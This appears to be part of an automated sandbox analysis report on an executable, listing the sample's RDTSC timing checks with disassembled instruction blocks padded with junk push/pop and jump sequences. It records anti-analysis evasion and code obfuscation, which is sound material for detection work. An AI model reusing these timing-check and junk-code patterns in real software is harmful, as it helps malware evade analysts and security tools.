              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F279E4 second address: F27A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD042h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F88DC6CD049h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A1B second address: F27A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A1F second address: F27A2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A2D second address: F27A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A32 second address: F27A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD041h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F88DC6CD047h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F27A5E second address: F27A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED5C35 second address: ED5C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD046h 0x00000007 pushad 0x00000008 jc 00007F88DC6CD036h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED5C56 second address: ED5C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB14Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED5C71 second address: ED5C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD044h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: ED5C89 second address: ED5C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F2917B second address: F29185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F88DC6CD036h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F28235 second address: F28258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F88DD0CB152h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F29330 second address: F29342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F29342 second address: F293EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F88DD0CB14Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F88DD0CB148h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D38EEh] 0x0000002e push eax 0x0000002f jmp 00007F88DD0CB14Dh 0x00000034 pop ebx 0x00000035 push dword ptr fs:[00000000h] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 jno 00007F88DD0CB14Ch 0x00000049 mov eax, dword ptr [ebp+122D0D65h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F88DD0CB148h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 push FFFFFFFFh 0x0000006b mov dword ptr [ebp+122D1F4Dh], eax 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 jns 00007F88DD0CB146h 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F293EC second address: F293F6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F88DC6CD036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC4F49 second address: EC4F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC4F4D second address: EC4F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F32643 second address: F32649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F32649 second address: F3264D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F327D4 second address: F327D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F38F5F second address: F38F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD046h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F38F82 second address: F38F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F38F8C second address: F38F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3DA18 second address: F3DA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB150h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3C771 second address: F3C775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3C775 second address: F3C794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F88DD0CB159h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3CD21 second address: F3CD27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3CFCF second address: F3CFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3CFD5 second address: F3CFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jc 00007F88DC6CD036h 0x0000000c popad 0x0000000d pop edi 0x0000000e pushad 0x0000000f jmp 00007F88DC6CD040h 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3CFF9 second address: F3D006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F88DD0CB14Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3D128 second address: F3D15B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F88DC6CD036h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F88DC6CD03Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F88DC6CD045h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3D535 second address: F3D580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F88DD0CB155h 0x0000000a push edx 0x0000000b jmp 00007F88DD0CB153h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 push edi 0x00000015 jnl 00007F88DD0CB152h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F3D580 second address: F3D584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46276 second address: F4627C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4627C second address: F46282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46282 second address: F4628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F88DD0CB146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F468A4 second address: F468AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F469E8 second address: F469FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB152h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F469FE second address: F46A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jbe 00007F88DC6CD03Ch 0x00000016 jnc 00007F88DC6CD036h 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007F88DC6CD03Fh 0x00000024 jng 00007F88DC6CD036h 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46A38 second address: F46A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnp 00007F88DD0CB14Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46F2C second address: F46F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F88DC6CD03Ch 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F46F3E second address: F46F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F470AB second address: F470C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD044h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EF60F8 second address: EF6118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F88DD0CB151h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EF6118 second address: EF611D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F475D8 second address: F47612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Dh 0x00000007 jnp 00007F88DD0CB146h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jmp 00007F88DD0CB152h 0x00000015 pop edx 0x00000016 pop edi 0x00000017 push ebx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push edx 0x0000001c pop edx 0x0000001d jnp 00007F88DD0CB146h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F45F5E second address: F45F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F45F64 second address: F45F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4A7D8 second address: F4A7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F88DC6CD03Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4A7EA second address: F4A7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4A7F5 second address: F4A7FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C48F second address: F0C494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C494 second address: F0C4F2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F88DC6CD038h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov di, 346Ah 0x00000011 lea eax, dword ptr [ebp+124881C4h] 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F88DC6CD038h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov edx, edi 0x00000033 jne 00007F88DC6CD050h 0x00000039 nop 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C4F2 second address: F0C4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C4F6 second address: F0C500 instructions: 0x00000000 rdtsc 0x00000002 je 00007F88DC6CD036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C500 second address: EF558B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F88DD0CB14Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F88DD0CB14Ah 0x00000010 nop 0x00000011 mov edx, edi 0x00000013 call dword ptr [ebp+122DB6DCh] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007F88DD0CB146h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0C5EF second address: F0C5F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0CACF second address: D57C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F88DD0CB152h 0x0000000c nop 0x0000000d jg 00007F88DD0CB146h 0x00000013 push dword ptr [ebp+122D16C9h] 0x00000019 mov cl, B7h 0x0000001b mov ecx, dword ptr [ebp+122D3A26h] 0x00000021 call dword ptr [ebp+122D305Ch] 0x00000027 pushad 0x00000028 cmc 0x00000029 xor eax, eax 0x0000002b add dword ptr [ebp+122D2C5Ch], ebx 0x00000031 sub dword ptr [ebp+122D2C5Ch], ecx 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007F88DD0CB152h 0x00000040 mov dword ptr [ebp+122D3ABEh], eax 0x00000046 pushad 0x00000047 mov ecx, 32B1ADF2h 0x0000004c cld 0x0000004d popad 0x0000004e mov esi, 0000003Ch 0x00000053 jmp 00007F88DD0CB14Ah 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c cld 0x0000005d lodsw 0x0000005f jmp 00007F88DD0CB14Fh 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007F88DD0CB14Ch 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 sbb edi, 4D8821E9h 0x00000078 mov dword ptr [ebp+122D2C5Ch], edi 0x0000007e popad 0x0000007f cmc 0x00000080 nop 0x00000081 push ecx 0x00000082 jmp 00007F88DD0CB14Bh 0x00000087 pop ecx 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jnc 00007F88DD0CB14Ch 0x00000091 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0CBEB second address: F0CC0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD043h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0CF1E second address: F0CF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0CF22 second address: F0CF31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D7E9 second address: F0D837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F88DD0CB156h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov ecx, dword ptr [ebp+122D25EDh] 0x00000016 lea eax, dword ptr [ebp+12488208h] 0x0000001c mov cl, E3h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jno 00007F88DD0CB146h 0x00000028 jmp 00007F88DD0CB154h 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D837 second address: F0D852 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88DC6CD038h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F88DC6CD03Ch 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D852 second address: F0D858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D858 second address: F0D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0D85C second address: EF60F8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F88DD0CB146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F88DD0CB148h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 or dword ptr [ebp+122D2C1Fh], ecx 0x0000002d lea eax, dword ptr [ebp+124881C4h] 0x00000033 sub edx, dword ptr [ebp+122D2DCCh] 0x00000039 jmp 00007F88DD0CB14Ch 0x0000003e nop 0x0000003f jg 00007F88DD0CB14Ah 0x00000045 push eax 0x00000046 pushad 0x00000047 push ebx 0x00000048 push ecx 0x00000049 pop ecx 0x0000004a pop ebx 0x0000004b jmp 00007F88DD0CB155h 0x00000050 popad 0x00000051 nop 0x00000052 mov dword ptr [ebp+122D2FE9h], esi 0x00000058 call dword ptr [ebp+122D1F12h] 0x0000005e pushad 0x0000005f jmp 00007F88DD0CB152h 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4E870 second address: F4E882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F88DC6CD03Bh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EB7E second address: F4EB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EB82 second address: F4EBB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD042h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F88DC6CD041h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 js 00007F88DC6CD036h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EBB3 second address: F4EBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EBB7 second address: F4EBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F88DC6CD040h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F88DC6CD043h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EBE6 second address: F4EBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4ED3F second address: F4ED48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4ED48 second address: F4ED50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4ED50 second address: F4ED54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4ED54 second address: F4ED58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EFDA second address: F4EFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F4EFDE second address: F4EFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
